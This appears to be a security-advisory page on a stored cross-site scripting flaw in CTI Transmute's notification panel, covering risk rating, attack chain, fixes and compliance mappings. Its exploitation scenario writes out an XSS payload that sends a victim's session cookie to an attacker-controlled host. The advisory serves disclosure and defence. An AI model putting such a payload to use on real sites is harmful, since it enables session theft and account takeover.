CTI Transmute: stored XSS in notification panel — AWAITING NVD (CVE-2026-9806)

CISO Take

CTI Transmute (MISP's CTI format-conversion tool) contained a stored XSS flaw in its notification bell dropdown, where user-controlled convert names were injected into innerHTML without sanitization, enabling arbitrary JavaScript execution in any authenticated user's browser session. The practical risk is limited: the vulnerability existed only on a development branch and has been patched via commit cf42409 — production deployments using a released version were never exposed. With no CVSS score assigned, no public exploits, and no CISA KEV listing, exploitation likelihood in the wild is very low; however, teams sharing development instances among analysts should treat this as a session-hijacking risk against high-value threat intelligence users. Verify you are running the patched release and enforce a hard policy against deploying unvetted development branches to shared environments.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Low overall risk. The development-branch-only scope significantly constrains blast radius — production users of released CTI Transmute builds were not affected at any point. Stored XSS in an authenticated CTI platform still poses meaningful risk in dev/staging environments shared across threat analyst teams, where a single exploit could compromise sessions with access to sensitive intelligence data. No CVSS vector, no public exploit code, and no active exploitation evidence keep this in the informational-to-low tier.

Attack Kill Chain

Malicious Convert Creation

Attacker with convert-creation access crafts a convert name embedding an XSS payload (script tag or event handler), which is stored in the CTI Transmute backend.

AML.T0049

Notification Queued

The platform generates a notification referencing the malicious convert name, storing unsanitized HTML content in the notification bell queue for all relevant users.

Victim Triggers Execution

An authenticated analyst or CISO opens the notification panel, causing the browser to render the payload via innerHTML and execute the injected JavaScript in their session context.

AML.T0011

Session Exfiltration

Injected script silently transmits the victim's session cookie or performs unauthorized platform actions, granting the attacker full access to the CTI platform under the analyst's identity.

AML.T0025

Malicious Convert Creation

Attacker with convert-creation access crafts a convert name embedding an XSS payload (script tag or event handler), which is stored in the CTI Transmute backend.

AML.T0049

Notification Queued

The platform generates a notification referencing the malicious convert name, storing unsanitized HTML content in the notification bell queue for all relevant users.

Victim Triggers Execution

An authenticated analyst or CISO opens the notification panel, causing the browser to render the payload via innerHTML and execute the injected JavaScript in their session context.

AML.T0011

Session Exfiltration

Injected script silently transmits the victim's session cookie or performs unauthorized platform actions, granting the attacker full access to the CTI platform under the analyst's identity.

AML.T0025

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

5 steps

Upgrade to the patched release containing commit cf42409badc27b13d9bb644b9175aa7f27e11259 — this is the definitive fix.
Enforce branch deployment policies: only tagged releases go to shared or production environments; dev branches stay local.
Audit existing convert names for unexpected HTML or script content as a retrospective indicator of attempted exploitation.
Validate that your CTI Transmute deployment includes a strong Content-Security-Policy header (script-src 'self'; default-src 'self') to limit XSS blast radius.
If unable to patch immediately, restrict notification panel access to trusted-network users only.

Classification

Code Execution Data Leakage Auth Bypass Framework API AML.T0011 - User Execution AML.T0025 - Exfiltration via Cyber Means AML.T0036 - Data from Information Repositories AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

ISO 42001

A.9.3 - AI System Security

NIST AI RMF

GOVERN-1.7 - Processes for Identifying and Managing AI Risks

OWASP LLM Top 10

LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-9806?

CTI Transmute (MISP's CTI format-conversion tool) contained a stored XSS flaw in its notification bell dropdown, where user-controlled convert names were injected into innerHTML without sanitization, enabling arbitrary JavaScript execution in any authenticated user's browser session. The practical risk is limited: the vulnerability existed only on a development branch and has been patched via commit cf42409 — production deployments using a released version were never exposed. With no CVSS score assigned, no public exploits, and no CISA KEV listing, exploitation likelihood in the wild is very low; however, teams sharing development instances among analysts should treat this as a session-hijacking risk against high-value threat intelligence users. Verify you are running the patched release and enforce a hard policy against deploying unvetted development branches to shared environments.

Is CVE-2026-9806 actively exploited?

No confirmed active exploitation of CVE-2026-9806 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-9806?

1. Upgrade to the patched release containing commit cf42409badc27b13d9bb644b9175aa7f27e11259 — this is the definitive fix. 2. Enforce branch deployment policies: only tagged releases go to shared or production environments; dev branches stay local. 3. Audit existing convert names for unexpected HTML or script content as a retrospective indicator of attempted exploitation. 4. Validate that your CTI Transmute deployment includes a strong Content-Security-Policy header (script-src 'self'; default-src 'self') to limit XSS blast radius. 5. If unable to patch immediately, restrict notification panel access to trusted-network users only.

What systems are affected by CVE-2026-9806?

This vulnerability affects the following AI/ML architecture patterns: Threat intelligence platforms, CTI format conversion pipelines, AI-augmented SOC analyst workflows, Analyst-facing security tooling.

What is the CVSS score for CVE-2026-9806?

No CVSS score has been assigned yet.

AI Security Impact

Affected AI Architectures

Threat intelligence platformsCTI format conversion pipelinesAI-augmented SOC analyst workflowsAnalyst-facing security tooling

MITRE ATLAS Techniques

AML.T0011 User Execution

AML.T0025 Exfiltration via Cyber Means

AML.T0036 Data from Information Repositories

AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

ISO 42001: A.9.3

NIST AI RMF: GOVERN-1.7

OWASP LLM Top 10: LLM06

Technical Details

Original Advisory

A stored cross-site scripting (XSS) vulnerability exists in the notification panel of CTI Transmute in versions prior to the patched release. Notification messages containing user-controlled convert names were rendered in the notification bell dropdown using innerHTML without adequate sanitization. An attacker able to create or influence a convert name that is included in a notification could inject arbitrary JavaScript, which would execute in the browser of an authenticated user when they opened the notification panel. Successful exploitation could allow the attacker to perform actions in the victim's session or access information available to the application in the browser context. The issue was remediated by constructing notification elements through DOM methods and assigning notification message content via textContent instead of innerHTML. This vulnerability was only present on a development branch.

Exploitation Scenario

An attacker with convert-creation permissions in CTI Transmute — a malicious insider, a compromised service account, or an external actor who gained write access via a separate vulnerability — crafts a convert name containing a JavaScript payload such as `<img src=x onerror="fetch('https://attacker.com/?s='+btoa(document.cookie))">`. The platform stores this name and queues a notification. When a CISO or senior analyst opens the notification bell dropdown — a routine action during threat review — the payload silently executes, exfiltrating their session token to the attacker's server. The attacker replays the stolen token to access the full CTI platform as the victim, potentially poisoning threat intelligence feeds consumed by downstream AI enrichment pipelines.